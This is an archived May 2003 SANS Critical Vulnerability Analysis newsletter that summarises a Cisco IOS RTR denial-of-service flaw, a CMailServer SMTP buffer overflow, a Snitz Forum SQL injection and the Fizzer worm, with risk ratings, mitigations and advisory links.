From: The SANS Institute (CriticalVulnerabilityAnalysissans.org)
Date: Mon May 19 2003 - 11:21:06 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

***********************************************************************
               SANS Critical Vulnerability Analysis
May 19, 2003 Vol. 2. No. 19
***********************************************************************

Note: Due to a mailing error, some subscribers received an old copy of
the CVA newsletter this morning. We apologize for the confusion.

The weekly CVA prioritizes and summarizes the most important
vulnerabilities and attacks identified during the past week and provides
guidance on appropriate actions to protect your systems.

***********************************************************************

Table of Contents:
Widely Deployed Software:
(1) MODERATE: Cisco IOS RTR Responder Denial Of Service

Other Software:
(2) HIGH: CMailServer SMTP Service Buffer Overflow
(3) MODERATE: Snitz Forum register.asp SQL Injection

Exploit Code:
(4) Fizzer

****************** This Issue Sponsored By Qualys *********************

Discover Rogue Devices on Your Network for FREE

Qualys FreeMap is a web-based technology that let's you monitor your
ENTIRE network including routers, VPN servers and wireless access
points. Take advantage of this FREE service before someone takes
advantage of your network. Get your Free Map now!

https://freemap.qualys.com/?lsid=590 .

******************** Other Sponsored Links ***************************
Privacy notice: These links redirect to non-SANS web pages.

1. Are remote users leaving your network open to hackers? Find out in
PestPatrol's FREE White Paper.
http://www.sans.org/cgi-bin/sanspromo/CVA51
- ----------------------------------------------
2. Testing Your Network - Key Steps to Complete Security
FREE White Paper
http://www.sans.org/cgi-bin/sanspromo/CVA52
- ----------------------------------------------
3. Alert! Spam & email attacks are getting worse. Learn 10 techniques
to stop them. ***White Paper***
http://www.sans.org/cgi-bin/sanspromo/CVA53

***********************************************************************
Highlighted Training Program of the Week!
Monterey CA in June is simply spectacular - and this SANS program is
right on Fisherman's Wharf. SANS Computer Security Bootcamp 2003 is
the most intense learning environment that most people ever experience.
SANS pioneered immersion training for information security; this unique
process increases retention and comprehension, empowering you to put
what you are taught into practice. Tracks include SANS Security
Essentials and CISSP CBK, Firewalls, Intrusion Detection, Hacker
Techniques, Securing Windows, and the new best-seller, Auditing
Networks, Perimeters, and Systems.
http://www.sans.org/bootcamp03/
***********************************************************************

**************************************************
Widely Deployed Software
**************************************************

(1) MODERATE: Cisco IOS RTR Responder Denial of Service
Affected Products:
Major IOS Release versions:
12.0S, SC, ST, SL, SP, SX
12.1, E, EA, EC, EX, EY
12.2, DA, S

Description:
The Response Time Reporter (RTR) feature in Cisco IOS allows routers to
monitor network performance by taking periodic measurements of response
times between two network endpoints. The router gathers data by sending
probes and monitoring the time taken to receive a response. Some RTR
measurements require that the probe recipient be another IOS device
running the "RTR responder" control protocol on port 1967/udp. A remote
attacker can crash a device running "RTR responder" by sending a
malformed packet to the listening port. The vulnerable service is not
enabled by default.

Council Site Actions:
Most of the reporting council sites responded that they do not have the
RTR feature enabled; therefore, no action was necessary. There were
two sites that did have the feature enabled - one of these sites
deployed the patches and the other site disabled the feature until
systems have been patched.

Risk: Remote attackers can crash IOS-based devices running the "RTR
responder" service.

Deployment: Widely deployed.
85% of all Internet traffic traverses Cisco routers and this
vulnerability affects a large number of IOS software releases. However,
the vulnerable feature is not enabled by default.

Ease of Exploitation: Unknown.
Cisco has not revealed specific details of the malformed RTR packet
which causes the crash. Attackers must experiment with a vulnerable
device to gain further information.

Status: Vendor confirmed, fixed software available. The Cisco advisory
contains the various software release details. As a workaround, the RTR
responder service may be disabled or UDP port 1967 traffic may be
blocked at the network perimeter (this port number is not configurable).

References:
Cisco Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20030515-saa.shtml

Understanding the SAA (RTR) feature:
http://www.employees.org/~etychon/presentations/etychon-saa-ripe-43.pdf

SecurityFocus BID:
http://www.securityfocus.com/bid/7607

******************************************************
Other Software
******************************************************

(2) HIGH: CMailServer SMTP Service Buffer Overflow

Affected Products:
YoungZSoft CMailServer versions 4.0.2003.03.27 and
4.0.2002.11.24

Description:
The CMailServer SMTP service contains a buffer overflow vulnerability
in handling overlong parameters (2000+ bytes) provided to the SMTP "MAIL
FROM" and "RCPT TO" commands. Remote attackers can exploit the flaws to
either crash the SMTP server or execute arbitrary code with Windows
"SYSTEM" privileges.

Council Site Actions:
The affected software is not in production or widespread use at any of
the council sites.

Risk: Remote SYSTEM-level compromise of Windows platforms running the
CMailServer SMTP service.
   
Deployment: Moderate.
CMailServer is a compact email server software for Windows NT/2000/XP
that is most often used in small- to medium-sized business environments.
The program is especially popular in China and rates as "popular" on
the cnet.com and zdnet.com download sites.

Ease of Exploitation: Straightforward.
This is a stack-based buffer overflow. The advisory provides examples
of how to trigger the flaw to crash the server, but no code execution
exploit has yet been released.

Status: Vendor confirmed. The problem is fixed in version
4.0.2003.03.30.

References:
Posting by Dennis Rand:
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0062.html

Vendor Homepage:
http://www.youngzsoft.net/cmailserver/

SecurityFocus BIDs:
http://www.securityfocus.com/bid/7547
http://www.securityfocus.com/bid/7548

*************************************************************

(3) MODERATE: Snitz Forum register.asp SQL Injection

Affected Products:
Snitz Forums 2000 3.3.03 and potentially earlier versions
   
Description:
Snitz is a freeware, ASP-based web forum software which supports the
following back-end databases: MySQL, Microsoft Access 97/2000/2002 and
Microsoft SQL Server 6.5/7.0/2000. Snitz's register.asp script handles
new user registration and requires the new user to enter an email
address. The script does not properly filter shell metacharacters from
the email address, allowing an attacker to execute arbitrary SQL
commands on the back-end database. In configurations using MS SQL, an
attacker may be able to leverage the SQL injection to invoke the
xp_cmdshell stored procedure -- allowing execution of arbitrary
non-interactive shell commands on the host operating system.

Council Site Actions:
The affected software is not in production or widespread use at any of
the council sites.

Risk: Remote compromise of the Snitz forum back-end database, and
potentially of the host operating system. Successful attackers can
execute any database command that the Snitz forum process is allowed to
execute (determined by the privileges of the user account Snitz uses to
access the backend database).

Deployment: Moderate.
According to the vendor website, Snitz version 3.4.03 has been
downloaded more than 115000 times. The forum software is used by
commercial organizations as well as web communities.

Ease of Exploitation: Trivial.
Example exploit code has been included with the advisory. In the case
of Snitz forums running MS SQL Server, the SQL injection can be
leveraged to execute arbitrary shell commands if the user account Snitz
uses to connect to the database is allowed to execute xp_cmdshell.
Depending on the role assigned to the connecting user account,
xp_cmdshell commands will be executed with the privileges of the SQL
server process or the privileges of the user account.

Status: The problem is fixed in version 3.4.03 which was released
September 16, 2002.

References:
Vulnerability Advisory:
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0067.html

SecurityFocus BID:
http://www.securityfocus.com/bid/7549

Vendor Homepage:
http://forum.snitz.com/

Background Information concerning xp_cmdshell privileges
http://www.databasejournal.com/features/mssql/article.php/1580041

Snitz Configuration Information
http://www.biddenhamvillage.co.uk/forum/readme.htm

******************************************************
Exploit Code
******************************************************
(4) Fizzer

Fizzer, a hybrid virus that propagates through mass-mailing and KaZaA
file sharing, is believed to have infected thousands of computer systems
this week. The virus mails a copy of itself to all addresses found in
the Windows Address Book. It also searches for directories containing
files being shared via KaZaA, and copies the worm executable there under
multiple random filenames (this makes the worm available via the KaZaA
network). In both cases, the malware arrives as an executable that a
victim must launch to become infected. Compromised computers connect to
various IRC and AIM chat rooms and await attacker instructions. The
malware also sets up a keystroke logger and a HTTP server (on port
81/tcp), disables antivirus programs, and provides for additional
backdoor access via TCP ports 2018-2021.

Symantec
http://www.symantec.com/avcenter/venc/data/w32.hllw.fizzermm.html

MessageLabs VirusEye
http://www.messagelabs.com/viruseye/threats/

McAfee
http://vil.mcafee.com/dispVirus.asp?virus_k=100295

News Articles
http://www.securityfocus.com/news/4660
http://zdnet.com.com/2100-1105_2-1001062.html

******************************************************************
Subscriptions: The CVA is distributed free of charge to people
responsible for securing information systems and networks. You may
forward this newsletter to any people with such responsibility inside
or outside your organization.

To subscribe, at no cost, go to https://portal.sans.org where you may
also request subscriptions to any of SANS other free newsletters.

To change your subscription, address, or other information, visit
http://portal.sans.org

Copyright 2003. All rights reserved. No copying, forwarding, or reuse
allowed, other than those listed in the preceding paragraph, without
written permission from the SANS Institute. Email sansrosans.org
for permission.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (Darwin)

iD8DBQE+yOrP+LUG5KFpTkYRAnAxAKCLpdOMAemnpyIic+QCdpu64fgGYgCfZ3p2
JztDhAp4CWCwq68F3ccyTeQ=
=1sLy
-----END PGP SIGNATURE-----

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]